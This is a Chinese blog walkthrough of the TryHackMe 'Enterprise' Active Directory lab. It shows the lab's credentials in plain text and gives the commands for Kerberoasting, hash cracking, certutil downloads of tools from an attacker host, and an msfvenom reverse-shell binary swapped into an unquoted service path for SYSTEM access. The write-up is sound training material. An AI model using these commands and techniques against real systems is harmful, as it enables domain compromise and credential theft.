TryHackMe-Enterprise

已于 2023-01-15 14:15:04 修改
阅读量203 收藏
点赞数
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: windows ActiveDirectory 活动目录 Kerberos 渗透测试
于 2023-01-07 14:14:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/128590581
版权

Enterprise

难度:难

  • Active directory
  • Kerberos
  • Real world

您刚刚进入内部网络。您扫描网络,只有域控制器…

端口扫描

循例 nmap扫:nmap -sS -sV 10.10.61.164 -p 1-10000 -T5:

53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-01-07 02:54:00Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5357/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7990/tcp open  http          Microsoft IIS httpd 10.0
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: LAB-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

从扫描结果我们不难看出,域名:

ENTERPRISE.THM

remmina连接3389,查看证书信息,我们得到:

LAB-DC.LAB.ENTERPRISE.THM

80、5357都是web,都没有任何信息,7990是一个登录页面

SMB枚举

smbclient -L 10.10.61.164

有这么些文件夹:

ADMIN$          Disk      Remote Admin
C$              Disk      Default share
Docs            Disk      
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share 
SYSVOL          Disk      Logon server share 
Users           Disk      Users Share. Do Not Touch!

Docs目录:

smbclient //10.10.61.164/Docs                                     127 ⨯ 1 ⚙
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
.                                   D        0  Mon Mar 15 10:47:35 2021
..                                  D        0  Mon Mar 15 10:47:35 2021
RSA-Secured-Credentials.xlsx        A    15360  Mon Mar 15 10:46:54 2021
RSA-Secured-Document-PII.docx       A    18432  Mon Mar 15 10:45:24 2021

我们发现了powershell的history

smb: \LAB-ADMIN\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\> ls

.                                   D        0  Fri Mar 12 12:00:39 2021
..                                  D        0  Fri Mar 12 12:00:39 2021
Consolehost_hisory.txt              A      424  Fri Mar 12 11:51:46 2021

里面披露了一组凭据:

echo "replication:101RepAdmin123!!">private.txt

经过尝试,这组凭据似乎并不有效

OSINT

回头来看那个登录页面:

提醒所有Enterprise-THM员工:
我们要搬去Github了!

根据这段话,我们去github搜索:Enterprise-THM

没有找到什么存储库,但是有一个user引起我们的注意:

Enterprise.THM

该用户的头像跟我们的题目一样,看来没错了

该用户有一个存储库,但是没啥东西。

但是它的People下有一个用户,并且该用户也有一个存储库

https://github.com/Nik-enterprise-dev/mgmtScript.ps1

这里披露了凭据,但是是空的,我们通过查看github history就可以找到历史提交中存在一组凭据:

$userName = 'nik'
$userPassword = 'ToastyBoi!'

利用该账户能够进入smb共享文件夹,但是没啥有用的东西

Kerberoasting

现在这组凭据确认是有效的,我们现在有资格尝试Kerberoasting攻击:

python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -dc-ip 10.10.61.164 LAB.ENTERPRISE.THM/nik:ToastyBoi! -request

成功获得bitbucket账户的密码hash:

ServicePrincipalName  Name       MemberOf                                                     PasswordLastSet             LastLogon                   Delegation 
--------------------  ---------  -----------------------------------------------------------  --------------------------  --------------------------  ----------
HTTP/LAB-DC           bitbucket  CN=sensitive-account,CN=Builtin,DC=LAB,DC=ENTERPRISE,DC=THM  2021-03-12 09:20:01.333272  2021-04-26 23:16:41.570158

hashcat 爆破

将得到的密码hash保存到文件,并使用hashcat进行爆破:

hashcat -a 0 -m 13100 ./hash /usr/share/wordlists/rockyou.txt

成功获得明文密码:

littleredbucket

上帝封死了门和窗,但上帝也在房间内!

我们尝试使用该账户枚举smb、winrm/psexec登录,都不行,但是rdp却成功了

user.txt在桌面下

现在我们传入WinPEAS.exe和accesschk.exe

certutil -urlcache -split -f http://10.14.39.48:8000/winPEASx64.exe
certutil -urlcache -split -f http://10.14.39.48:8000/accesschk64.exe

运行winPEAS,通过winPEAS得知:

zerotieroneservice - binary path未引号包裹且路径有空格

该服务以system权限运行

C:\Users\bitbucket>sc qc zerotieroneservice
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: zerotieroneservice
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : zerotieroneservice
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

使用accesschk检索:

PS C:\Users\bitbucket> .\accesschk64.exe -w "C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe"

C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe
RW BUILTIN\Users
RW NT AUTHORITY\SYSTEM
RW BUILTIN\Administrators

我们对该exe文件可读写

C:\Users\bitbucket>accesschk64 -cv zerotieroneservice

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

zerotieroneservice
Medium Mandatory Level (Default) [No-Write-Up]
R  LAB-ENTERPRISE\bitbucket
        SERVICE_PAUSE_CONTINUE
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL

我们可以控制该服务启动或停止

Reverse shell

msfvenom生成reverse shell并上传到目标

msfvenom -p windows/x64/shell_reverse_tcp lhost=10.14.39.48 lport=8888 -f exe-service > she11.exe

使用certutil将文件上传,然后copy到目标目录并覆盖目标exe:

copy .\she11.exe "C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe"

在cmd运行:

sc stop zerotieroneservice
sc start zerotieroneservice

成功getshell

root.txt在administrator的桌面下

Sugobet
关注
专栏目录
三种修改root用户密码的方式:
西门一刀的博客
03-11 7627
方法一: 使用set password命令 首先登录MySQL,使用mysql自带的客户端连接mysql,命令如:mysql -uroot -p 会提示你输入当前root密码,默认为空,直接回车就可以了. 格式: mysql> set password for 用户名@localhost=password(‘新密码’); 例子: mysql> set password for root...
HTB打靶(Active Directory 101 Blackfield)
qq_18811919的博客
01-14 3589
HackTheBox Active Directory 101 Blackfield
TryHackMe-基本渗透测试
M1n9K1n9的博客
12-22 1095
这里的主要目标是尽可能多地学习。确保您使用OpenVPN配置文件连接到我们的网络。部署机器并连接到我们的网络查找计算机公开的服务按照上面这句话,我们先使用nmap简单扫一圈┌──(root💀kali)-[]└─#nmap-sS访问80端口的web,好像没东西,到8080端口看一下,有网页。
TryHackMe-VulnNet_Roasted
M1n9K1n9的博客
01-05 123
VulnNet Entertainment刚刚与新雇用的系统管理员一起在其网络上部署了一个新实例。作为一家具有安全意识的公司,他们一如既往地聘请您执行渗透测试,并查看系统管理员的表现。
Tryhackme-BurpSuite
热门推荐
个人博客
09-14 1万+
Burp Suite 文章目录Burp SuiteBurp Suite: The BasicsTask1 **Introduction** OutlineTask2 **Getting Started** What is Burp Suite?Task3 **Getting Started** Features of Burp CommunityTask4 **Getting Started** InstallationTask5 **Getting Started** The DashboardTask6
Tryhackme-Post-Exploitation Basics
个人博客
08-24 712
Post-Exploitation Basics 文章目录Post-Exploitation BasicsTask1 IntroductionTask2 Enumeration w/ PowerviewTask3 Enumeration w/ BloodhoundTask4 Dumping hashes w/ mimikatzTask5 Golden Ticket Attacks w/ mimikatztask6 Enumeration w/ Server ManagerTask7 Maintaini
TryHackMe-VulnNet: Active(ez 域渗透)
M1n9K1n9的博客
03-10 958
VulnNet Entertainment在他们以前的网络中遇到了不好的时光,该网络遭受了多次破坏。现在,他们移动了整个基础架构,并再次聘请您作为核心渗透测试人员。您的目标是获得对系统的完全访问权限并破坏域。
Tryhackme-Threat and Vulnerability Management
个人博客
08-13 1838
Threat and Vulnerability Management 文章目录Threat and Vulnerability ManagementNessustask1 Introductiontask2 Installationtask3 Navigation and Scanstask4 Scanning!task5 Scanning a Web Application!MIRETask1 Introduction to MITRETask2 Basic TerminologyTask3 ATT
TryHackMe-进攻性渗透测试-14_活动目录利用
M1n9K1n9的博客
12-25 593
现在我们已经进行了内部侦察,并了解了有关AD结构和环境的土地布局,是时候进入开发阶段了。此阶段利用错误配置来执行横向移动和权限提升的组合,直到我们到达合适的位置来执行我们的目标,如下图所示。这个阶段通常与坚持相结合,以确保我们不会失去我们获得的新位置,但这将在下一个房间中介绍。它通常也与额外的枚举相结合,因为我们的新位置可能允许我们获得有关土地布局的其他信息。Active Directory 可以通过称为权限委派的功能委派权限和特权(不要与下一个任务中将讨论的 Kerberos 委派混淆)。
全网都找不到的Plutext-Enterprise-3.3.0.6.zip
06-12
Plutext-Enterprise-3.3.0.6.zip是一个罕见的软件压缩包,其中包含的是Plutext Enterprise 3.3.0.6版本的组件。Plutext Enterprise是一款专注于文档处理的软件,尤其在处理docx4j、Word(docx)、Excel(xlsx)等...
grafana-enterprise-9.1.4-1.x86_64.rpm
09-14
grafana-enterprise-9.1.4-1.x86_64.rpm
grafana-enterprise-9.5.2.linux-amd64.tar.gz 二进制安装包
08-28
grafana-enterprise-9.5.2.linux-amd64.tar.gz 二进制安装包 grafana-enterprise-9.5.2.linux-amd64 grafana-enterprise grafana
grafana-enterprise-10.1.1-1.x86-64.rpm
09-13
grafana-enterprise-10.1.1-1.x86-64.rpm
JavaReport-V3-Enterprise-Released.rar
06-19
前几天要搞一个老掉牙的SSH项目,缺少了这个插件。全网去找,好不容易找到。放到WEB-INF/lib目录,发现不会自动引入,手动引入后,调用java report的程序不报错,但服务器出现放频繁出现it is not java class的错误...
流 Stream
最新发布
2401_84881237的博客
09-24 262
Stream 是延迟执行的,只有调用到结束操作,才触发整个流水线的执行。流处理是对运动中的数据的处理,在生成或接收数据时直接计算数据。流处理可以立即对事件做出反应,且可以处理比其他数据处理系统大得多的数据量:直接处理事件流,并且只保留数据中有意义的子集。流处理的每个操作阶段都会封装到一个 Sink 接口里,处理数据后再将数据传递给下游的 Sink。JDK 1.8 新增。将要处理的元素集合看作一种流,在管道的节点上进行处理。迭代流中的每个数据,即对每个数据进行最后的处理(比如保存到数据库中或打印)。
数据结构之线性表——LeetCode:707. 设计链表,206. 反转链表,92. 反转链表 II
u014114223的博客
09-21 731
模拟了一个链表数据结构,提供了初始化链表、获取特定位置节点值、在头部插入节点、在尾部插入节点、在特定位置插入节点以及删除特定位置节点等功能。设置为 0,表示链表中没有实际节点,同时创建一个虚拟头节点。次(因为虚拟头节点不算实际节点),找到目标节点并返回其值。以指示链表中的上一个节点。,即反转当前节点的指针方向,使其指向前一个节点。,即将当前节点变为反转后的链表中的新的末尾节点。的下一个节点,保存链表的后续部分。,实现在链表尾部插入节点的功能,因为当在长度为。的位置插入节点时,相当于在链表末尾追加节点。
【C++】模拟实现list
春风不语。
09-21 1203
本篇内容到这里就结束了,主要模拟实现了list容器的常用接口,希望对大家有些许帮助,祝大家天天开心!
小米 13 Ultra机型工程固件 资源预览与刷写说明 步骤解析
小马哥的专栏
09-21 121
小米 13 Ultra机型---机型代码为ishtar 。工程固件可以辅助修复格机活着全檫除分区后的基带修复。可以用于修复TEE损坏。以及一些分区的底层修复。此款固件也可以为更换UFS后的底包。 通过博文了解 1💝💝💝-----此机型工程固件的资源分享 下载 刷写注意事项 2💝💝💝-----此机型刷写工程固件预览界面 3💝💝💝 ------nv损坏的修复方法说明解析
redis-enterprise
10-14
好的,您的问题是 "redis-enterprise"。Redis Enterprise是Redis Labs公司提供的一种高级Redis解决方案,它提供了高可用性、线性扩展性、多租户支持、闪存优化和安全性等功能。Redis Enterprise还提供了一个Web管理界面,使得管理和监控Redis集群变得更加容易。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值